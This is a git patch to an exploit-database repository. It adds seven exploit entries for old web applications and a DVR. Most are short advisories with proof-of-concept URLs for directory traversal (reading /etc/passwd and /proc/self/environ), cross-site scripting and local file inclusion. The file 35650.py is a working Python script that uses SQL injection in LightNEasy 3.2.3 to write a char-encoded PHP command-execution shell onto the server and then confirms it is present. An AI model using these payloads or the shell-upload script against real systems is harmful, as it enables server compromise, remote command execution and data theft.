From 5ab0a9cb63b671061838597339dd375cbb757603 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 30 Dec 2014 08:37:44 +0000 Subject: [PATCH] Update: 2014-12-30 7 new exploits --- files.csv | 9 +++- platforms/android/remote/35637.py | 3 ++ platforms/linux/remote/35644.txt | 10 ++++ platforms/php/webapps/35645.txt | 9 ++++ platforms/php/webapps/35647.txt | 9 ++++ platforms/php/webapps/35648.txt | 11 ++++ platforms/php/webapps/35649.txt | 9 ++++ platforms/php/webapps/35650.py | 84 +++++++++++++++++++++++++++++++ platforms/php/webapps/35651.txt | 13 +++++ 9 files changed, 156 insertions(+), 1 deletion(-) create mode 100755 platforms/linux/remote/35644.txt create mode 100755 platforms/php/webapps/35645.txt create mode 100755 platforms/php/webapps/35647.txt create mode 100755 platforms/php/webapps/35648.txt create mode 100755 platforms/php/webapps/35649.txt create mode 100755 platforms/php/webapps/35650.py create mode 100755 platforms/php/webapps/35651.txt diff --git a/files.csv b/files.csv index cc051b1f3..51b246ff7 100755 --- a/files.csv +++ b/files.csv @@ -8,7 +8,7 @@ id,file,description,date,author,platform,type,port 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow Exploit",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow Exploit",2003-04-08,zillion,linux,remote,0 9,platforms/windows/dos/9.c,"Apache HTTP Server 2.x Memory Leak Exploit",2003-04-09,"Matthew Murphy",windows,dos,0 -10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 +10,platforms/linux/remote/10.c,"Samba <= 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 11,platforms/linux/dos/11.c,"Apache <= 2.0.44 Linux - Remote Denial of Service Exploit",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Local Root Exploit",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service Exploit",2003-04-18,"Luca Ercoli",windows,dos,0 @@ -32106,3 +32106,10 @@ id,file,description,date,author,platform,type,port 35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 +35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 +35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 'module' Parameter Cross Site Scripting Vulnerability",2011-04-20,Kurd-Team,php,webapps,0 +35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 +35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 '_zp_themeroot' Parameter Multiple Cross Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 +35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 'lang' Parameter Cross Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0 +35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0 +35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 Local File Include and Cross Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 diff --git a/platforms/android/remote/35637.py b/platforms/android/remote/35637.py index c29493c6e..6cda8fd77 100755 --- a/platforms/android/remote/35637.py +++ b/platforms/android/remote/35637.py @@ -1,3 +1,6 @@ +# Mirror: http://pastebin.com/raw.php?i=CZChGAnG +# Video: https://www.youtube.com/watch?v=V7bnLOohqqI + #!/usr/bin/python #-*- coding: utf-8 -* diff --git a/platforms/linux/remote/35644.txt b/platforms/linux/remote/35644.txt new file mode 100755 index 000000000..255838138 --- /dev/null +++ b/platforms/linux/remote/35644.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/47509/info + +Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks. + +Viola DVR VIO-4/1000 is vulnerable; other products may also be affected. + +http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd +http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35645.txt b/platforms/php/webapps/35645.txt new file mode 100755 index 000000000..0bc8a9eb8 --- /dev/null +++ b/platforms/php/webapps/35645.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47519/info + +Automagick Tube Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?module= \ No newline at end of file diff --git a/platforms/php/webapps/35647.txt b/platforms/php/webapps/35647.txt new file mode 100755 index 000000000..90aae918a --- /dev/null +++ b/platforms/php/webapps/35647.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47526/info + +SyCtel Design is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + + +http://www.example.com/index.php?menu=../../../proc/self/environ +http://www.example.com/index1.php?menu=../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/35648.txt b/platforms/php/webapps/35648.txt new file mode 100755 index 000000000..dbd2d615e --- /dev/null +++ b/platforms/php/webapps/35648.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/47528/info + +Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected. + +http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E + +http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35649.txt b/platforms/php/webapps/35649.txt new file mode 100755 index 000000000..be3ebc212 --- /dev/null +++ b/platforms/php/webapps/35649.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47540/info + +todoyu is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +todoyu 2.0.8 is vulnerable; other versions may also be affected. + +http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35650.py b/platforms/php/webapps/35650.py new file mode 100755 index 000000000..d93eccdf4 --- /dev/null +++ b/platforms/php/webapps/35650.py @@ -0,0 +1,84 @@ +source: http://www.securityfocus.com/bid/47541/info + +LightNEasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +LightNEasy 3.2.3 is vulnerable; other versions may also be affected. + +# ------------------------------------------------------------------------ +# Software................LightNEasy 3.2.3 +# Vulnerability...........SQL Injection +# Threat Level............Critical (4/5) +# Download................http://www.lightneasy.org/ +# Discovery Date..........4/21/2011 +# Tested On...............Windows Vista + XAMPP +# ------------------------------------------------------------------------ +# Author..................AutoSec Tools +# Site....................http://www.autosectools.com/ +# Email...................John Leitch +# ------------------------------------------------------------------------ +# +# +# --Description-- +# +# A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to +# extract arbitrary data. In some environments it may be possible to +# create a PHP shell. +# +# +# --PoC-- + +import socket + +host = 'localhost' +path = '/lne323' +shell_path = '/shell.php' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 73\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n' + 'Accept: text/html\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="submit"\r\n' + '\r\n' + '\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found' + else: print 'shell located at http://' + host + shell_path + +upload_shell() + diff --git a/platforms/php/webapps/35651.txt b/platforms/php/webapps/35651.txt new file mode 100755 index 000000000..c448ee9fc --- /dev/null +++ b/platforms/php/webapps/35651.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/47542/info + +Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks. + +The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Dolibarr 3.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E + +http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 \ No newline at end of file